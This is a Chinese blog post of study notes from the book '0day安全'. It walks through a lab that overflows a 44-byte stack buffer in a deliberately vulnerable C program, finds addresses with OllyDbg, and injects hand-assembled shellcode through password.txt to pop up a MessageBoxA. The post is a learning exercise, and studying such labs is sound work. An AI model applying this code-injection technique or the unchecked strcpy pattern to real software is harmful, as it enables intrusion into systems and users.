ch2:栈溢出,代码植入

最新推荐文章于 2022-07-27 18:35:15 发布
最新推荐文章于 2022-07-27 18:35:15 发布
阅读量629 收藏 1
点赞数 1
分类专栏: 《0day安全》学习札记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/x728999452/article/details/52936586
版权

实验环境:

操作系统Windows7
IDEVC 6.0
build版本debug


任务:通过向password.txt中写入二进制机器代码,来调用MessageBoxA,弹出消息框。


用于实验的C语言代码:

#include<stdio.h>
#include<windows.h>
#define PASSWORD "1234567"

int verify_password(char * password)
{
	int authenticated;
	char buffer[44];
	authenticated = strcmp(password,PASSWORD);
	strcpy(buffer,password);
	return authenticated;
}

int main()
{
	int valid_flag = 0;
	char password[1024];
	FILE * fp;
	LoadLibrary("user32.dll");//prepare for messagebox
	if(!(fp = fopen("password.txt", "rw+")))
	{
		exit(0);
	}
	fscanf(fp,"%s",password);
	valid_flag = verify_password(password);
	if(valid_flag)
	{
		printf("incorrect password!\n");
	}
	else
	{
		printf("Congratulation! You have passed the verification!\n");
	}
	fclose(fp);
}


在password.txt中写入数据。

通过OllyDbg打开.exe文件,调试,得到buffer数组的起始地址:0x0012FAB8


在0x0012FAE8处为该栈帧中的返回地址。


利用VC6的Tool Depends,可以得到如图信息:


USER32.dll 的基地址为0x77D10000,MessageBoxA的偏移地址为0x0005EA11。

得到MessageBoxA在内存中的入口地址为0x77D6EA11。


下面编写调用MessageBoxA函数的汇编代码:

XOR EBX, EBX(33DB)
PUSH EBX
PUSH 596F7521
PUSH 66756368
MOV EAX, ESP
PUSH EBX
PUSH EAX
PUSH EAX
PUSH EBX
MOV EAX, 0X77D6EA11
CALL EAX

上述汇编代码对应的机器代码略,因为上述汇编代码无法执行,因为在执行时找不到MessageBoxA函数的入口。

按照书上的步骤,寻找到的入口地址是错误的。


所以我将C语言代码小修改一下,如下。手动调用MessageBoxA函数。

LoadLibrary("user32.dll");
MessageBox(NULL,"123","123",NULL);

然后用OllyDbg调试新生成的PE文件。


找到入口地址为:75A8EA11

所以将上述汇编代码中的倒数第二句改为:

MOV EAX, 0x75A8EA11
这次汇编代码对应的机器代码为: 

33DB
53
68 59 6F 75 21
68 66 75 63 6B 
8B C4 
53
50 
50 
53
B8 11 EA A8 75
FF D0

以十六进制编辑器打开password.txt,修改其内容为:

中间0x90(nop指令)为填充所用。

最后程序执行情况,如图:

点击确定后,出现下图:

因为调用MessageBoxA后,没有写用于安全退出的代码。




回忆里的褶皱
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
VS2012下制作ActiveX控件并添加到网页
刺猬的优雅
12-16 6755
为了节省时间,大部分资源取自http://www.cnblogs.com/li-peng/p/3455247.html,感谢作者。 流程概览 1.创建ActiveX控件——按钮 2.定义一个接口,并在控件中实现 3.部署安装 4.CAB打包 5.添加到网页中进行测试 一. 创建ActiveX控件——按钮 1.新建一个Window窗体控件库
《0day安全》堆溢出利用(下)——代码植入
sunr_的博客
08-25 463
《0day2》堆溢出利用(下)——代码植入 常用狙击目标(xp sp1前) 与栈溢出中的“地毯式轰炸”不同,堆溢出更加精准,往往直接狙击重要目标。精准是DWORD SHO OT 的优点,但“火力不足”有时也会限制堆溢出的利用,这样就需要选择最重要的目标用来“狙击”。 &emps;1.内存变量:修改能够影响程序执行的重要标志变量,往往可以改变程序流程。(比如改了绕过身份验证) &emps;2.代码逻辑:修改代码段重要函数的关键逻辑有时可以达到一定攻击效果。(例如,程序分支处的判断逻辑,或者把
Pattern-Classification-2nd-CH2:《模式分类》第2版第2章编程任务
05-28
模式分类2nd-CH2 知识库中包含《模式分类》第二章的代码。 请参阅博客( )了解更多详细信息。 Bhattacharyya.m: Find the Bhattacharyya bound given means and covariances of single gaussian distributions. CH2.mat: CH2 data. CH2_1_a.m: Generate random vectors from the multivariate normal distribution. CH2_1_a_test.m: Generate two normal distributions and plot. CH2_1_b.m: Discriminant function of a normal distribution given prior probability
mikowski-ch2:保留单页Web应用程序第2章中的代码
05-13
mikowski-ch2 保留单页Web应用程序第2章中的代码
CH2 线性表例题代码.rar
08-27
CH2 线性表例题代码.rar
springmvc_ch2代码
04-22
NULL 博文链接:https://kavinhub.iteye.com/blog/1944884
[超详细]栈溢出漏洞原理实例讲解
热门推荐
Breeze的博客
05-03 2万+
[超详细]通过实例讲解栈溢出漏洞 文章目录[超详细]通过实例讲解栈溢出漏洞代码简介分析程序整体执行流程程序执行细节及栈空间变化栈溢出通过栈溢出控制程序执行结果通过栈溢出插入代码 本篇文章通过《0day安全:软件漏洞分析技术》书中第二章中所用到的一个程序的栈溢出漏洞的复现,以及使用OD一步步调试来学习栈溢出完整的原理。程序虽然简单,但在一些基础薄弱的人眼中还是无法理解,所以导致很多新手到了这里就被“...
栈溢出 代码植入
Misaka10046的博客
09-15 316
实验代码 #include<stdio.h> #include<windows.h> #define PASSWORD "1234567" int verify_password(char *password) { int authenticated; char buffer[44]; authenticated = strcmp(password,PASSWORD); strcpy(buffer,password);//overflowed return authenti
2.4 代码植入
qq_55202378的博客
07-22 703
栈溢出
代码植入与DEP
摔不死的笨鸟的博客
12-30 551
一、缓冲区溢出漏洞 #include "stdafx.h" #include<iostream> using namespace std; #define password "1234567" bool Verify(char *s) { int res; char Ver[8]; res = strcmp(s, password); strcpy(Ver, s); // 这里...
3.3 关于代码植入和定位shellcode的思考
qq_55202378的博客
07-27 334
shellcode
[0Day]栈溢出原理—— 注入自己的代码
desword-- 技术,杂文。
11-29 1371
这个小部分实验还是花了一点时间的。开始想知道就可以了,先不玩了。后来还是静下心来,把这个玩出来了。跳出msgbox还是很兴奋的,尽管里面啥都木有。 上有漏洞的代码: /* note: //MessageBox(0,"test","helloworld!",MB_OK); */ #include #include #include #define PASSWORD "123456"
数据库课件:Ch2:关系模型.ppt
09-19
数据库课件:Ch2:关系模型.ppt
WCF入门教程(四)通过Host代码方式来承载服务 一个WCF使用TCP协议进行通协的例子 jquery ajax调用WCF,采用System.ServiceModel.WebHttpBindin...
01-24 354
WCF入门教程(四)通过Host代码方式来承载服务 Posted on2014-05-15 13:03停留的风阅读(7681) 评论(0)编辑收藏 WCF入门教程(四)通过Host代码方式来承载服务 之前已经讲过WCF对外发布服务的具体方式。 WCF入门教程(一)简介 Host承载,可以是web,也可以是控制台程序等等。比WebService有更大的使用...
常用收藏(自己用的)
羽筠的博客
12-04 1万+
PC端&移动端的页面常用的到的CSS、JS、HTML收藏(自己用的)
软件漏洞分析入门_初级栈溢出_植入任意代码(3)
个人笔记
07-08 183
植入任意代码环境工具漏洞程序代码控制流程OD中调试找主函数main技巧验证覆盖buff[44]注意事项找MessageBoxA地址获取机器码方法 环境 VC++6.0 工具 OD Dependency 漏洞程序代码 #include <stdio.h> #include <windows.h> #define PASSWORD "1234567" int verify_password (char *password) { int authenticated;
栈溢出】3.代码注入
weixin_41421812的博客
11-26 3706
1.输入11组4321 buffer[44] 2.查看MessageBoxA入口地址 找到VC++6.0安装路径下的Tools里Depends,运行 拖一个有图形界面的PE文件进去,查看user32.dlll的基地址(0x69E00000)和MessageBoxA的偏移地址(0x000834D0) 计算出MessageBoxA内存中入口地址(0x69E834D0) 出现问题: MessageBox内存地址查找出错,重找: #include<windows.h>
【0day安全实验四】2.4代码植入
diamond_biu的博客
08-29 1020
实验目的 实验二、三中依此展示了淹没相邻变量与返回地址,改变函数流程的方法。本次实验展示——通过栈溢出让进程执行输入数据中植入代码。 在buffer中包含想要执行的代码,通过返回地址让程序跳转到系统栈里执行。 实验内容 编写C程序 #include <stdio.h> #include <string.h> #include <windows.h> #include <stdlib.h> #define PASSWORD "1234567" int veri
3.简单的代码植入
huobengle
12-03 231
还是那个程序稍作修改 #include &lt;stdio.h&gt; #include &lt;windows.h&gt; #define PASSWORD "1234567" int verify_password(char *password) { int authenticated; char buffer[44]; authenticated=strcmp(password,...
[CH2:1]1[NH:6][CH2:5][CH2:4][O:3][CH2:2]1.[CH3:7][c:8]1[o:31][c:11](-[c:12]2[cH:30][c:29]3[c:15]([o:16][cH:17][c:18]3-[c:19]3[cH:28][c:26]([F:27])[c:22]([C:23](O)=[O:24])[cH:21][cH:20]3)[cH:14][cH:13]2)[n:10][n:9]1>>[CH3:7][c:8]1[o:31][c:11](-[c:12]2[cH:30][c:29]3[c:15]([o:16][cH:17][c:18]3-[c:19]3[cH:28][c:26]([F:27])[c:22]([C:23]([N:6]4[CH2:5][CH2:4][O:3][CH2:2][CH2:1]4)=[O:24])[cH:21][cH:20]3)[cH:14][cH:13]2)[n:10][n:9]1
最新发布
07-17
根据你提供的 SMILES 字符串 `[CH2:1]1[NH:6][CH2:5][CH2:4][O:3][CH2:2]1.[CH3:7][c:8]1[o:31][c:11](-[c:12]2[cH:30][c:29]3[c:15]([o:16][cH:17][c:18]3-[c:19]3[cH:28][c:26]([F:27])[c:22]([C:23](O)=[O:24])...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值